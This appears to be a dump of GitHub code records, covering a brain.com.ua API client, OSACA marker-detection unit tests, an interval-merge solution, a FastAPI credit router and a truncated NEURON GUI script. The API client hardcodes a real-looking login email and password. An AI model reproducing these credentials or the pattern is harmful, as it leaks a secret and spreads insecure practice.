\"\\033[0;33m\\tparts yellow\\033[0m\")\nprint(\"\\033[1;31m\"+str(round(dict(result.items())['x'][1], 3)) +\n \"\\033[0;31m\\tparts red\\033[0m\")\nprint(\"\\033[1;34m\"+str(round(dict(result.items())['x'][2], 3)) +\n \"\\033[0;34m\\tparts blue\\033[0m\")\nprint(\"error of \"+str(round(dict(result.items())['fun'], 3)))\n", "repo_name": "michaelnoguera/spectrophotometry", "sub_path": "spectrophotometry.py", "file_name": "spectrophotometry.py", "file_ext": "py", "file_size_in_byte": 5172, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.optimize.OptimizeResult", "line_number": 112, "usage_type": "attribute"}, {"api_name": "scipy.optimize", "line_number": 112, "usage_type": "name"}, {"api_name": "scipy.optimize.minimize", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "10158622187", "text": "import requests\nimport json\nimport xlwt\n\n\nURL = \"https://api.brain.com.ua/\" # Константа домена сайта\n\n\ndef get_key():\n \"\"\"Функция получает ключ сессии\"\"\"\n\n url = \"https://api.brain.com.ua/auth\"\n req = requests.post(url, data={\"login\": \"casy@zest.com.ua\",\n 'password':\n \"b6f19093a07cdf6e2fe098d7aee90b2f\"})\n diction = json.loads(req.content)\n return diction[\"result\"]\n\n\ndef get_categories(SID):\n req = requests.get(URL+\"/categories/\"+SID)\n dict_of_categories = json.loads(req.content)[\"result\"]\n return dict_of_categories\n\n\ndef 
get_IDs_by_pricelist(json_file=None):\n if json_file is None:\n # TODO Путь сделать относительным!\n with open(\"Z:/Repositories/testrepo1/Work/1/get1.json\",\n \"r\",\n encoding=\"UTF-8\") as file:\n json_file = json.load(file)\n list_of_IDs = []\n for prop in json_file.keys():\n list_of_IDs.append(prop)\n return list_of_IDs\n\n\ndef get_props(ID, SID):\n req = requests.get(URL + \"/product/\" + str(ID) + \"/\" + SID)\n props = json.loads(req.content)\n return props[\"result\"]\n\n\ndef good_view(props):\n dict_good_props = {}\n rules = {\n \"productID\": \"ID\",\n \"name\": \"Название\",\n \"articul\": \"Артикул\",\n \"product_code\": \"Код товара\",\n \"price\": \"Цена\",\n \"brief_description\": \"Короткое описание\",\n \"description\": \"Описание\",\n \"warranty\": \"Гарантия, мес.\",\n \"large_image\": \"Фото\"\n }\n for rule in rules.keys():\n dict_good_props[rule] = rules[rule]\n\n main_props = {}\n for propty in dict_good_props:\n main_props[rules[propty]] = props[propty]\n options = props[\"options\"]\n new_options = {}\n counter = 0\n\n for option in options:\n new_options[option[\"name\"]] = option[\"value\"]\n counter += 1\n main_props.update(new_options)\n print(main_props)\n return main_props\n\n\ndef get_ID(product):\n return product[\"productID\"]\n\n\ndef get_IDs(products_list):\n list_of_IDs = []\n for product in products_list:\n list_of_IDs.append(product[\"productID\"])\n return list_of_IDs\n\n\ndef get_IDs_of_category(category_number, SID):\n req_of_category = requests.get(URL + \"products/\" +\n str(category_number)+\"/\"+SID).content\n json_of_category = json.loads(req_of_category)[\"result\"][\"list\"]\n list_of_IDs = get_IDs(json_of_category)\n return list_of_IDs\n\n\ndef category_to_json(category_number, SID):\n dict_of_info = {}\n c = 0\n for product_ID in get_IDs_of_category(category_number, SID):\n props = good_view(get_props(product_ID, SID))\n # TODO statistics()\n name = \"rootID\"\n dict_of_info[name] = props\n c += 1\n if c == 20:\n return dict_of_info\n break\n\n\n# def get_product(ID, SID):\n\n\n# def props_to_table(props, line):\n# with open(\"Z:\\Repositories\\testrepo1\\Work\\1\\xl_test.xls\",\"a\")\n", "repo_name": "Casy7/ONU_projects", "sub_path": "Work/1/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3129, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 88, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "2238347698", "text": "#!/usr/bin/env python3\n\"\"\"\nUnit tests for IACA/OSACA marker utilities\n\"\"\"\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nfrom osaca.semantics import (\n reduce_to_section,\n find_basic_blocks,\n find_jump_labels,\n find_basic_loop_bodies,\n)\nfrom osaca.parser import ParserAArch64, ParserX86ATT\n\n\nclass TestMarkerUtils(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.parser_AArch = 
ParserAArch64()\n self.parser_x86 = ParserX86ATT()\n with open(self._find_file(\"triad_arm_iaca.s\")) as f:\n triad_code_arm = f.read()\n with open(self._find_file(\"triad_x86_iaca.s\")) as f:\n triad_code_x86 = f.read()\n self.parsed_AArch = self.parser_AArch.parse_file(triad_code_arm)\n self.parsed_x86 = self.parser_x86.parse_file(triad_code_x86)\n\n #################\n # Test\n #################\n\n def test_marker_detection_AArch64(self):\n kernel = reduce_to_section(self.parsed_AArch, \"AArch64\")\n self.assertEqual(len(kernel), 138)\n self.assertEqual(kernel[0].line_number, 307)\n self.assertEqual(kernel[-1].line_number, 444)\n\n def test_marker_detection_x86(self):\n kernel = reduce_to_section(self.parsed_x86, \"x86\")\n self.assertEqual(len(kernel), 9)\n self.assertEqual(kernel[0].line_number, 146)\n self.assertEqual(kernel[-1].line_number, 154)\n\n def test_marker_matching_AArch64(self):\n # preparation\n bytes_1_line = \".byte 213,3,32,31\\n\"\n bytes_2_lines_1 = \".byte 213,3,32\\n\" + \".byte 31\\n\"\n bytes_2_lines_2 = \".byte 213,3\\n\" + \".byte 32,31\\n\"\n bytes_2_lines_3 = \".byte 213\\n\" + \".byte 3,32,31\\n\"\n bytes_3_lines_1 = \".byte 213,3\\n\" + \".byte 32\\n\" + \".byte 31\\n\"\n bytes_3_lines_2 = \".byte 213\\n\" + \".byte 3,32\\n\" + \".byte 31\\n\"\n bytes_3_lines_3 = \".byte 213\\n\" + \".byte 3\\n\" + \".byte 32,31\\n\"\n bytes_4_lines = \".byte 213\\n\" + \".byte 3\\n\" + \".byte 32\\n\" + \".byte 31\\n\"\n bytes_hex = \".byte 0xd5, 0x3, 0x20, 0x1f\\n\"\n bytes_mixed = \".byte 0xd5\\n.byte 3,0x20\\n.byte 31\\n\"\n mov_start_1 = \"mov x1, #111\\n\"\n mov_start_2 = \"mov x1, 111 // should work as well\\n\"\n mov_end_1 = \"mov x1, #222 // preferred way\\n\"\n mov_end_2 = \"mov x1, 222\\n\"\n prologue = (\n \"mov x12, xzr\\n\"\n + \"\\tldp x9, x10, [sp, #16] // 8-byte Folded Reload\\n\"\n + \" .p2align 6\\n\"\n )\n kernel = (\n \".LBB0_28:\\n\"\n + \"fmul v7.2d, v7.2d, v19.2d\\n\"\n + \"stp q0, q1, [x10, #-32]\\n\"\n + \"b.ne .LBB0_28\\n\"\n )\n epilogue = \".LBB0_29: // Parent Loop BB0_20 Depth=1\\n\" + \"bl dummy\\n\"\n kernel_length = len(list(filter(None, kernel.split(\"\\n\"))))\n\n bytes_variations = [\n bytes_1_line,\n bytes_2_lines_1,\n bytes_2_lines_2,\n bytes_2_lines_3,\n bytes_3_lines_1,\n bytes_3_lines_2,\n bytes_3_lines_3,\n bytes_4_lines,\n bytes_hex,\n bytes_mixed,\n ]\n mov_start_variations = [mov_start_1, mov_start_2]\n mov_end_variations = [mov_end_1, mov_end_2]\n # actual tests\n for mov_start_var in mov_start_variations:\n for bytes_var_1 in bytes_variations:\n for mov_end_var in mov_end_variations:\n for bytes_var_2 in bytes_variations:\n sample_code = (\n prologue\n + mov_start_var\n + bytes_var_1\n + kernel\n + mov_end_var\n + bytes_var_2\n + epilogue\n )\n with self.subTest(\n mov_start=mov_start_var,\n bytes_start=bytes_var_1,\n mov_end=mov_end_var,\n bytes_end=bytes_var_2,\n ):\n sample_parsed = self.parser_AArch.parse_file(sample_code)\n sample_kernel = reduce_to_section(sample_parsed, \"AArch64\")\n self.assertEqual(len(sample_kernel), kernel_length)\n kernel_start = len(\n list(\n filter(\n None,\n (prologue + mov_start_var + bytes_var_1).split(\"\\n\"),\n )\n )\n )\n parsed_kernel = self.parser_AArch.parse_file(\n kernel, start_line=kernel_start\n )\n self.assertEqual(sample_kernel, parsed_kernel)\n\n def test_marker_matching_x86(self):\n # preparation\n bytes_1_line = \".byte 100,103,144\\n\"\n bytes_2_lines_1 = \".byte 100,103\\n\" + \".byte 144\\n\"\n bytes_2_lines_2 = \".byte 100\\n\" + \".byte 103,144\\n\"\n bytes_3_lines = (\n 
\".byte 100 # IACA MARKER UTILITY\\n\"\n + \".byte 103 # IACA MARKER UTILITY\\n\"\n + \".byte 144 # IACA MARKER UTILITY\\n\"\n )\n bytes_hex_line = \".byte 0x64,0x67,0x90\\n\"\n bytes_mixed = \".byte 0x64 # MARKER\\n .byte 103,0x90 # ANOTHER MARKER\\n\"\n mov_start_1 = \"movl $111, %ebx # IACA START\\n\"\n mov_start_2 = \"mov $111, %ebx # IACA START\\n\"\n mov_end_1 = \"movl $222, %ebx # IACA END\\n\"\n mov_end_2 = \"mov $222, %ebx # IACA END\\n\"\n prologue = \"movl -92(%rbp), %r11d\\n\" + \"movl $111, %ebx\\n\"\n kernel = (\n \"vfmadd132sd (%r15,%rcx,8), %xmm5, %xmm0\\n\"\n + \"vmovsd %xmm0, (%r14,%rcx,8)\\n\"\n + \"cmpl %ebx, %ecx\\n\"\n + \"jge .L8\\n\"\n )\n epilogue = \".LE9:\\t\\t#12.2\\n\" \"call dummy\\n\"\n kernel_length = len(list(filter(None, kernel.split(\"\\n\"))))\n\n bytes_variations = [\n bytes_1_line,\n bytes_2_lines_1,\n bytes_2_lines_2,\n bytes_3_lines,\n bytes_hex_line,\n bytes_mixed,\n ]\n mov_start_variations = [mov_start_1, mov_start_2]\n mov_end_variations = [mov_end_1, mov_end_2]\n # actual tests\n for mov_start_var in mov_start_variations:\n for bytes_var_1 in bytes_variations:\n for mov_end_var in mov_end_variations:\n for bytes_var_2 in bytes_variations:\n sample_code = (\n prologue\n + mov_start_var\n + bytes_var_1\n + kernel\n + mov_end_var\n + bytes_var_2\n + epilogue\n )\n with self.subTest(\n mov_start=mov_start_var,\n bytes_start=bytes_var_1,\n mov_end=mov_end_var,\n bytes_end=bytes_var_2,\n ):\n sample_parsed = self.parser_x86.parse_file(sample_code)\n sample_kernel = reduce_to_section(sample_parsed, \"x86\")\n self.assertEqual(len(sample_kernel), kernel_length)\n kernel_start = len(\n list(\n filter(\n None,\n (prologue + mov_start_var + bytes_var_1).split(\"\\n\"),\n )\n )\n )\n parsed_kernel = self.parser_x86.parse_file(\n kernel, start_line=kernel_start\n )\n self.assertEqual(sample_kernel, parsed_kernel)\n\n def test_marker_special_cases_AArch(self):\n bytes_line = \".byte 213,3,32,31\\n\"\n start_marker = \"mov x1, #111\\n\" + bytes_line\n end_marker = \"mov x1, #222\\n\" + bytes_line\n prologue = \"dup v0.2d, x14\\n\" \"neg x9, x9\\n\" \".p2align 6\\n\"\n kernel = (\n \".LBB0_28:\\n\"\n + \"fmul v7.2d, v7.2d, v19.2d\\n\"\n + \"stp q0, q1, [x10, #-32]\\n\"\n + \"b.ne .LBB0_28\\n\"\n )\n epilogue = \".LBB0_29: // Parent Loop BB0_20 Depth=1\\n\" \"bl dummy\\n\"\n\n samples = [\n # (test name,\n # ignored prologue, section to be extraced, ignored epilogue)\n (\"markers\", prologue + start_marker, kernel, end_marker + epilogue),\n (\"marker at file start\", start_marker, kernel, end_marker + epilogue),\n (\"no start marker\", \"\", prologue + kernel, end_marker + epilogue),\n (\"marker at file end\", prologue + start_marker, kernel, end_marker),\n (\"no end marker\", prologue + start_marker, kernel + epilogue, \"\"),\n (\"empty kernel\", prologue + start_marker, \"\", end_marker + epilogue),\n ]\n\n for test_name, pro, kernel, epi in samples:\n code = pro + kernel + epi\n parsed = self.parser_AArch.parse_file(code)\n test_kernel = reduce_to_section(parsed, \"AArch64\")\n if kernel:\n kernel_length = len(kernel.strip().split(\"\\n\"))\n else:\n kernel_length = 0\n self.assertEqual(\n len(test_kernel),\n kernel_length,\n msg=\"Invalid exctracted kernel length on {!r} sample\".format(test_name),\n )\n if pro:\n kernel_start = len((pro).strip().split(\"\\n\"))\n else:\n kernel_start = 0\n parsed_kernel = self.parser_AArch.parse_file(kernel, start_line=kernel_start)\n self.assertEqual(\n test_kernel,\n parsed_kernel,\n msg=\"Invalid exctracted kernel on 
{!r}\".format(test_name),\n )\n\n def test_marker_special_cases_x86(self):\n bytes_line = \".byte 100\\n\" \".byte 103\\n\" \".byte 144\\n\"\n start_marker = \"movl $111, %ebx\\n\" + bytes_line\n end_marker = \"movl $222, %ebx\\n\" + bytes_line\n prologue = \"movl -88(%rbp), %r10d\\n\" \"xorl %r11d, %r11d\\n\" \".p2align 4,,10\\n\"\n kernel = (\n \".L3: #L3\\n\"\n \"vmovsd .LC1(%rip), %xmm0\\n\"\n \"vmovsd %xmm0, (%r15,%rcx,8)\\n\"\n \"cmpl %ecx, %ebx\\n\"\n \"jle .L3\\n\"\n )\n epilogue = \"leaq -56(%rbp), %rsi\\n\" \"movl %r10d, -88(%rbp)\\n\" \"call timing\\n\"\n samples = [\n # (test name,\n # ignored prologue, section to be extraced, ignored epilogue)\n (\"markers\", prologue + start_marker, kernel, end_marker + epilogue),\n (\"marker at file start\", start_marker, kernel, end_marker + epilogue),\n (\"no start marker\", \"\", prologue + kernel, end_marker + epilogue),\n (\"marker at file end\", prologue + start_marker, kernel, end_marker),\n (\"no end marker\", prologue + start_marker, kernel + epilogue, \"\"),\n (\"empty kernel\", prologue + start_marker, \"\", end_marker + epilogue),\n ]\n\n for test_name, pro, kernel, epi in samples:\n code = pro + kernel + epi\n parsed = self.parser_x86.parse_file(code)\n test_kernel = reduce_to_section(parsed, \"x86\")\n if kernel:\n kernel_length = len(kernel.strip().split(\"\\n\"))\n else:\n kernel_length = 0\n self.assertEqual(\n len(test_kernel),\n kernel_length,\n msg=\"Invalid exctracted kernel length on {!r} sample\".format(test_name),\n )\n if pro:\n kernel_start = len((pro).strip().split(\"\\n\"))\n else:\n kernel_start = 0\n parsed_kernel = self.parser_x86.parse_file(kernel, start_line=kernel_start)\n self.assertEqual(\n test_kernel,\n parsed_kernel,\n msg=\"Invalid exctracted kernel on {!r}\".format(test_name),\n )\n\n def test_find_jump_labels(self):\n self.assertEqual(\n find_jump_labels(self.parsed_x86),\n OrderedDict(\n [\n (\".LFB24\", 10),\n (\".L4\", 65),\n (\".L3\", 79),\n (\".L2\", 102),\n (\".L13\", 111),\n (\".L12\", 120),\n (\".L6\", 132),\n (\".L10\", 145),\n (\".L9\", 161),\n (\".L8\", 183),\n (\".L15\", 252),\n (\".L26\", 256),\n (\".L14\", 259),\n (\".LFB25\", 277),\n (\".L28\", 289),\n ]\n ),\n )\n\n self.assertEqual(\n find_jump_labels(self.parsed_AArch),\n OrderedDict(\n [\n (\"triad\", 18),\n (\".LBB0_3\", 71),\n (\".LBB0_4\", 76),\n (\".LBB0_5\", 84),\n (\".LBB0_7\", 92),\n (\".LBB0_8\", 95),\n (\".LBB0_9\", 106),\n (\".LBB0_11\", 118),\n (\".LBB0_12\", 133),\n (\".LBB0_14\", 177),\n (\".LBB0_15\", 190),\n (\".LBB0_16\", 205),\n (\".LBB0_17\", 208),\n (\".LBB0_18\", 221),\n (\".LBB0_19\", 228),\n (\".LBB0_20\", 260),\n (\".LBB0_22\", 272),\n (\".LBB0_24\", 283),\n (\".LBB0_26\", 290),\n (\".LBB0_28\", 298),\n (\".LBB0_29\", 306),\n (\".LBB0_31\", 448),\n (\".LBB0_32\", 458),\n (\".LBB0_33\", 480),\n (\".LBB0_34\", 484),\n (\".LBB0_35\", 493),\n (\".LBB0_36\", 504),\n (\".LBB0_37\", 508),\n (\".LBB0_38\", 518),\n (\"main\", 574),\n ]\n ),\n )\n\n def test_find_basic_blocks(self):\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_blocks(self.parsed_x86).items()\n ],\n [\n (\".LFB24\", 11, 56),\n (\".L4\", 66, 74),\n (\".L3\", 80, 89),\n (\".L2\", 103, 112),\n (\".L13\", 112, 121),\n (\".L12\", 121, 125),\n (\".L6\", 133, 135),\n (\".L10\", 146, 154),\n (\".L9\", 162, 170),\n (\".L8\", 184, 187),\n (\".L15\", 253, 256),\n (\".L26\", 257, 259),\n (\".L14\", 260, 262),\n (\".LFB25\", 278, 290),\n (\".L28\", 290, 300),\n ],\n )\n\n self.assertEqual(\n [\n (k, 
v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_blocks(self.parsed_AArch).items()\n ],\n [\n (\"triad\", 19, 64),\n (\".LBB0_3\", 72, 77),\n (\".LBB0_4\", 77, 83),\n (\".LBB0_5\", 85, 89),\n (\".LBB0_7\", 93, 95),\n (\".LBB0_8\", 96, 105),\n (\".LBB0_9\", 107, 114),\n (\".LBB0_11\", 119, 134),\n (\".LBB0_12\", 134, 173),\n (\".LBB0_14\", 178, 191),\n (\".LBB0_15\", 191, 205),\n (\".LBB0_16\", 206, 208),\n (\".LBB0_17\", 209, 222),\n (\".LBB0_18\", 222, 228),\n (\".LBB0_19\", 229, 261),\n (\".LBB0_20\", 261, 269),\n (\".LBB0_22\", 273, 280),\n (\".LBB0_24\", 284, 286),\n (\".LBB0_26\", 291, 293),\n (\".LBB0_28\", 299, 307),\n (\".LBB0_29\", 307, 444),\n (\".LBB0_31\", 449, 459),\n (\".LBB0_32\", 459, 480),\n (\".LBB0_33\", 481, 484),\n (\".LBB0_34\", 485, 494),\n (\".LBB0_35\", 494, 504),\n (\".LBB0_36\", 505, 508),\n (\".LBB0_37\", 509, 518),\n (\".LBB0_38\", 519, 568),\n (\"main\", 575, 590),\n ],\n )\n\n def test_find_basic_loop_body(self):\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_loop_bodies(self.parsed_x86).items()\n ],\n [(\".L4\", 66, 74), (\".L10\", 146, 154), (\".L28\", 290, 300)],\n )\n\n self.assertEqual(\n [\n (k, v[0][\"line_number\"], v[-1][\"line_number\"])\n for k, v in find_basic_loop_bodies(self.parsed_AArch).items()\n ],\n [\n (\".LBB0_12\", 134, 173),\n (\".LBB0_15\", 191, 205),\n (\".LBB0_18\", 222, 228),\n (\".LBB0_29\", 307, 444),\n (\".LBB0_32\", 459, 480),\n (\".LBB0_35\", 494, 504),\n ],\n )\n\n ##################\n # Helper functions\n ##################\n\n @staticmethod\n def _find_file(name):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, \"test_files\", name)\n assert os.path.exists(name)\n return name\n\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(TestMarkerUtils)\n unittest.TextTestRunner(verbosity=2).run(suite)\n", "repo_name": "RRZE-HPC/OSACA", "sub_path": "tests/test_marker_utils.py", "file_name": "test_marker_utils.py", "file_ext": "py", "file_size_in_byte": 18012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 251, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 18, "usage_type": "attribute"}, {"api_name": "osaca.parser.ParserAArch64", "line_number": 21, "usage_type": "call"}, {"api_name": "osaca.parser.ParserX86ATT", "line_number": 22, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 35, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 41, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 111, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 183, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 225, "usage_type": "call"}, {"api_name": "osaca.semantics.reduce_to_section", "line_number": 273, "usage_type": "call"}, {"api_name": "osaca.semantics.find_jump_labels", "line_number": 296, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 297, "usage_type": "call"}, {"api_name": "osaca.semantics.find_jump_labels", "line_number": 319, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 320, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_blocks", "line_number": 360, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_blocks", "line_number": 384, "usage_type": "call"}, 
{"api_name": "osaca.semantics.find_basic_loop_bodies", "line_number": 424, "usage_type": "call"}, {"api_name": "osaca.semantics.find_basic_loop_bodies", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 452, "usage_type": "call"}, {"api_name": "os.path", "line_number": 452, "usage_type": "attribute"}, {"api_name": "unittest.TestLoader", "line_number": 457, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 458, "usage_type": "call"}]} +{"seq_id": "36993405869", "text": "from typing import List\n\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n stack = []\n intervals.sort(key= lambda i : i[0])\n\n for time in intervals:\n if len(stack) == 0:\n stack.append(time)\n else:\n if time[0] <= stack[-1][1]:\n previous = stack.pop()\n maxEnd = max(time[1], previous[1])\n stack.append([previous[0], maxEnd])\n else:\n stack.append(time)\n return stack\n\nif __name__ == \"__main__\":\n arr = [[1,4],[0,4]]\n sol = Solution()\n sol.merge(arr)", "repo_name": "sumanshil/TopCoder", "sub_path": "TopCoder/python/arr/PythonSimpleStackSolution.py", "file_name": "PythonSimpleStackSolution.py", "file_ext": "py", "file_size_in_byte": 661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "18510391664", "text": "from fastapi import APIRouter\nfrom fastapi import Path, Query, Depends\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel, Field\nfrom typing import Optional, List\nfrom config.database import Session\nfrom models.credito import Credito as CreditModel\nfrom fastapi.encoders import jsonable_encoder\nfrom middlewares.jwt_bearer import JWTBearer\nfrom services.credito import CrediService\nfrom schemas.credito import Credito\n\nmovie_router = APIRouter()\n\n@movie_router.get(\n path='/credits',\n tags=['Credit'],\n summary=\"Show all credits\",\n response_model=List[Credito],\n status_code=200,\n dependencies= [Depends(JWTBearer())])\ndef get_movies() -> List[Credito]:\n db = Session()\n result = CrediService(db).get_creditos()\n return JSONResponse(status_code=200, content=jsonable_encoder(result)) \n\n@movie_router.get('/credits/{id}', \n tags=['Credit'],\n summary=\"Obtener crédito por ID\",\n response_model=Credito,\n status_code=200)\ndef get_movie(id: int = Path(ge=1, le=2000)) -> Credito:\n db = Session()\n result = CrediService(db).get_credito(id)\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n return JSONResponse(status_code=200, content=jsonable_encoder(result))\n\n@movie_router.post(\n path='/credits',\n tags=['Credit'],\n summary=\"Crear a registro de crédito.\",\n response_model=dict,\n status_code=201)\ndef create_movie(credit: Credito) -> dict:\n db = Session()\n CrediService(db).create_credito(credit)\n return JSONResponse(status_code=201,content={\"message\":\"Tú crédito ha sido registrado con éxito\"})\n\n@movie_router.put(\n path='/credits/{id}',\n tags=['Credit'],\n summary=\"Modificar crédito\",\n response_model=dict,\n status_code=200)\ndef update_movies(id:int, credit: 
Credito) -> dict:\n db = Session()\n result = CrediService(db).get_credito(id)\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n CrediService(db).update_credito(id, credit)\n return JSONResponse(status_code=200, content={\"message\":\"Crédito actualizado\"}) \n \n@movie_router.delete(\n path='/credits/{id}',\n tags=['Credit'],\n summary=\"Delete a credit with the ID\",\n response_model=dict,\n status_code=200)\ndef delete_movie(id: int) -> dict:\n db = Session()\n result : CreditModel = db.query(CreditModel).filter(CreditModel.id == id).first()\n if not result:\n return JSONResponse(status_code=404, content={'message':'Cliente no registrado'})\n CrediService(db).delete_credito(id)\n return JSONResponse(status_code=200,content={\"message\":\"Crédito eliminado\"})", "repo_name": "chechorios2008/FastAPI-with-SQL", "sub_path": "routers/credito.py", "file_name": "credito.py", "file_ext": "py", "file_size_in_byte": 2712, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "config.database.Session", "line_number": 23, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 24, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 19, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 21, "usage_type": "call"}, {"api_name": "middlewares.jwt_bearer.JWTBearer", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "config.database.Session", "line_number": 33, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 34, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 37, "usage_type": "call"}, {"api_name": "schemas.credito.Credito", "line_number": 30, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 32, "usage_type": "name"}, {"api_name": "schemas.credito.Credito", "line_number": 45, "usage_type": "name"}, {"api_name": "config.database.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 47, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "schemas.credito.Credito", "line_number": 56, "usage_type": "name"}, {"api_name": "config.database.Session", "line_number": 57, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 58, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 62, "usage_type": "call"}, {"api_name": 
"config.database.Session", "line_number": 71, "usage_type": "call"}, {"api_name": "models.credito.Credito", "line_number": 72, "usage_type": "name"}, {"api_name": "models.credito.Credito.id", "line_number": 72, "usage_type": "attribute"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "services.credito.CrediService", "line_number": 75, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "22642925642", "text": "from __future__ import division\nfrom collections import OrderedDict\nimport sys, pdb, matplotlib, os\nimport numpy as np\n\nos.chdir('../function_scripts')\nfrom neuron import gui,h\nmatplotlib.use(\"TkAgg\")\n\nos.chdir('../function_scripts')\nimport synapse_functions\n\n# Keep at end of imports\nfrom CableGUI import *\nfrom Simulators import *\n\n# =========================== Updates Functions (connection between GUI and Simulator) ===========================\ndef UpdateEntryParams(Simulator, GUI):\n\n\t'''\n\tUpdate parameters according to values in Entries. This is used once upon initialization of the GUI (when mode==\n\t'initialized'), and then again each time there is an update to one or more of the GUI features (mode=='update').\n\n\tUses global variables:\n\t\t\tExample: {'simulation': {'attribute': value}, \n\t\t\t\t\t 'synapses': {'exc': {'attribute': value}, 'inh': {'attribute': value}}, \n\t\t\t\t\t etc.}\n\t\t- Simulator: Simulators object that is updated according to user choices\n\t\t- GUI: GUI object through which user makes choices\n\t'''\n\n\tall_dict = {}\n\tall_dict.update(GUI.Entries['simulation'])\n\tall_dict.update(GUI.Entries['synapse_exc'])\n\tall_dict.update(GUI.Entries['synapse_inh'])\n\tif Simulator.soma:\n\t\tall_dict.update(GUI.Entries['soma'])\n\tif Simulator.spines_exist:\n\t\tall_dict.update(GUI.Entries['spines'])\n\n\tfor item in all_dict:\n\t\ttemp_val = all_dict[item]['Var'].get()\n\t\t# Set Simulator properties\n\t\tif 'h.' not in item:\n\t\t\ttry:\n\t\t\t\texec('Simulator.' + item + \" = %s\"%float(temp_val))\n\t\t\texcept:\n\t\t\t\texec('Simulator.' + item + \" = \\'%s\\'\"%temp_val)\n\n\t\t# Set simulation parameters (inside hoc interpreter(=h))\n\t\telif 'h.' 
